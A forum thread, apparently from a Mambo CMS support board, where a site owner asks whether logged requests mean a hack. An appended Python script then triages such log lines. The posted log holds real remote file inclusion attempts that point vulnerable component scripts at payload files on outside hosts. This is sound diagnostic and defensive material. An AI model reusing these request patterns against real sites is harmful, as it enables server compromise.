#1
Join Date: Sep 2004
Location: Vienna
Posts: 22
Are these log entries any proof that the Mambo installation has been hacked? There are so many of them... It seems to be an attempt to abuse the site, but how can I know if it succeeded?
Code:
```
zeus.freshwebhosts.com - - [12/Nov/2007:23:33:49 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.85.234/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.808" 18541 loretto.at
wpc1127.amenworld.com - - [12/Nov/2007:19:40:15 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.803" 16219 loretto.at
wpc1127.amenworld.com - - [12/Nov/2007:18:44:15 +0100] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://71.41.190.203/safeon.txt?? HTTP/1.1" 200 959 "-" "libwww-perl/5.803" 2147 loretto.at
wpc1127.amenworld.com - - [12/Nov/2007:07:03:49 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.803" 4680 loretto.at
webhodi-isp.de - - [11/Nov/2007:06:52:46 +0100] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://72.1.85.234/safeon.txt?? HTTP/1.1" 200 955 "-" "libwww-perl/5.803" 26175 loretto.at
webhodi-isp.de - - [11/Nov/2007:06:52:46 +0100] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://72.1.85.234/safeon.txt?? HTTP/1.1" 200 955 "-" "libwww-perl/5.803" 22889 loretto.at
web1.doogen.com - - [12/Nov/2007:23:31:26 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.85.234/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.803" 17664 loretto.at
web1.doogen.com - - [10/Nov/2007:17:41:34 +0100] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 200 1013 "-" "libwww-perl/5.803" 5897 loretto.at
vps598.inmotionhosting.com - - [12/Nov/2007:06:10:45 +0100] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ctegp.com.br/modules/My_eGallery/safeon.txt?? HTTP/1.1" 200 1005 "-" "libwww-perl/5.808" 15285 loretto.at
vps598.inmotionhosting.com - - [11/Nov/2007:11:24:20 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ctegp.com.br/modules/My_eGallery/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.808" 20319 loretto.at
static-ip-85-25-148-183.inaddr.intergenia.de - - [12/Nov/2007:01:05:18 +0100] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 318 "-" "libwww-perl/5.805" 16775 loretto.at
srv_200-61-15-115.solunet.com.ar - - [12/Nov/2007:00:18:58 +0100] "GET /?mosConfig_absolute_path=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 200 27519 "-" "libwww-perl/5.803" 11182 loretto.at
sherbak-69.colo2.kv.wnet.ua - - [12/Nov/2007:08:17:35 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://elc.ntin.edu.tw/4images/data/database/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.805" 24871 loretto.at
server198130.evanzo-server.de - - [12/Nov/2007:20:32:39 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.803" 9254 loretto.at
server1.idcnetbr.com - - [11/Nov/2007:16:14:29 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://asantecaravans.co.za/content/rss1/cmd.txt? HTTP/1.1" 404 319 "-" "libwww-perl/5.808" 28490 loretto.at
tiger.phpweb.biz - - [11/Nov/2007:13:23:26 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.805" 5506 loretto.at
```

I would appreciate your opinion, as dealing with logfiles and hackers is quite new to me.

Michael

#2
Join Date: Dec 2006
Posts: 502
Better to ask your host ... doesn't look good though. Tell your host what version you are running too. And make sure you keep on tight to your backup.
__________________
Tengu webDesign: www.tengu.nl
Official Mambo Support Forum: forum.mambo-foundation.org/

#3
Join Date: Sep 2004
Location: Vienna
Posts: 22
I will ask the ISP ... and continue with the backups ...
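
One way to triage entries like those posted in #1, added here as an example and not part of the original thread: it flags requests whose query string passes a remote URL as a parameter value and separates 404 responses (the targeted script is not on the server) from 2xx responses (the script exists and answered, so the component and the PHP configuration need inspecting; the status alone is not proof the include ran). The sample lines, host names and addresses are constructed; the two script paths are the ones seen in the posted log.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample lines in the posted log format; hosts and addresses are placeholders.
SAMPLE_LOG = """\
scanner-a.example.net - - [12/Nov/2007:23:33:49 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://192.0.2.10/x.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.808" 18541 site.example
scanner-b.example.net - - [12/Nov/2007:18:44:15 +0100] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http%3A%2F%2F198.51.100.7%2Fx.txt%3F HTTP/1.1" 200 959 "-" "libwww-perl/5.803" 2147 site.example
visitor.example.org - - [12/Nov/2007:18:50:02 +0100] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 27519 "-" "Mozilla/5.0" 3010 site.example
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def verdict_for(status):
    """404: script absent, nothing ran. 2xx: script answered, inspect it. Else: look manually."""
    if status == 404:
        return "absent"
    return "review" if 200 <= status < 300 else "other"

def find_remote_includes(log_text):
    """Return one finding per request whose query string carries a remote URL as a value."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Split by hand: urlsplit() would read the leading "//" as a host name.
        path, _, query = m["target"].partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):  # percent-decodes too
            if REMOTE_RE.match(value):
                findings.append({
                    "client": m["client"], "when": m["when"], "param": name,
                    "script": re.sub(r"/{2,}", "/", path),   # collapse "//components"
                    "source": value.rstrip("?"), "size": m["size"],
                    "verdict": verdict_for(int(m["status"])),
                })
    return findings

def summarize(findings):
    """Count findings per (script, verdict) so the scripts to inspect stand out."""
    return Counter((f["script"], f["verdict"]) for f in findings)

if __name__ == "__main__":
    for (script, verdict), n in sorted(summarize(find_remote_includes(SAMPLE_LOG)).items()):
        print(f"{verdict:7} {n:3} {script}")
```

Scripts that show up under `review` are the ones to check on disk and to name, together with the installed version, when asking the host as suggested in #2.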